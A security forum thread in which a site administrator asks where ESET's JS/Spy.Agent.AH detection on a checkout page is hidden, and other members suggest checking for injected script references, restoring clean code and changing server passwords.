Jump to content
mpower

JS/Spy.Agent.AH found - but where?

Recommended Posts

In Chrome and Opera (not in Firefox) the JS/Spy.Agent.AH malware is being found be Eset. The malware was found in https://example.com/checkout/onepage/, so it does not say in which file. How do I know where the malware is hidden? Any advice?

This is how it looks like in the logs: leSv31t.png

Thanks!

Share this post


Link to post
Share on other sites

It should be exactly that page. However, I'm getting 404 "page not found" when trying to download it.

Share this post


Link to post
Share on other sites

Yeah, Its not the real domain, I changed it :-). Is the malware in a JS file or could it also be PHP?

Share this post


Link to post
Share on other sites

The website is really infected. In this case, the malicious JS is detected by several AVs, not only by ESET:

image.png

Share this post


Link to post
Share on other sites

Alright, can you give me a hint how to get the infected files?

 

Thanks!

Share this post


Link to post
Share on other sites
52 minutes ago, mpower said:

Alright, can you give me a hint how to get the infected files?

Why in the world would you want to do this?

Share this post


Link to post
Share on other sites

Are you an administrator of the website?

Share this post


Link to post
Share on other sites
Posted (edited)

Yes, I am the sites admin (should have mentioned that 😀) and I want to replace the infected files with the none infected version. If I knew the paths to the files(s) it would be no problem ...

Edited by mpower

Share this post


Link to post
Share on other sites

I took a code backup and deleted the old code which made it work again.

Thanks for your answers guys

Share this post


Link to post
Share on other sites
57 minutes ago, mpower said:

I took a code backup and deleted the old code which made it work again.

Thanks for your answers guys

There should be JS reference in your code that is linking to another script from another place where your detection has triggered , or it's hosted in your website which means they can access and upload files to the server

You should secure the server more , so you can make sure that they cannot inject a JS again.

Share this post


Link to post
Share on other sites

Yeah, I told my customer to change FTP/SSH and database passwords already ...

Thanks!

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...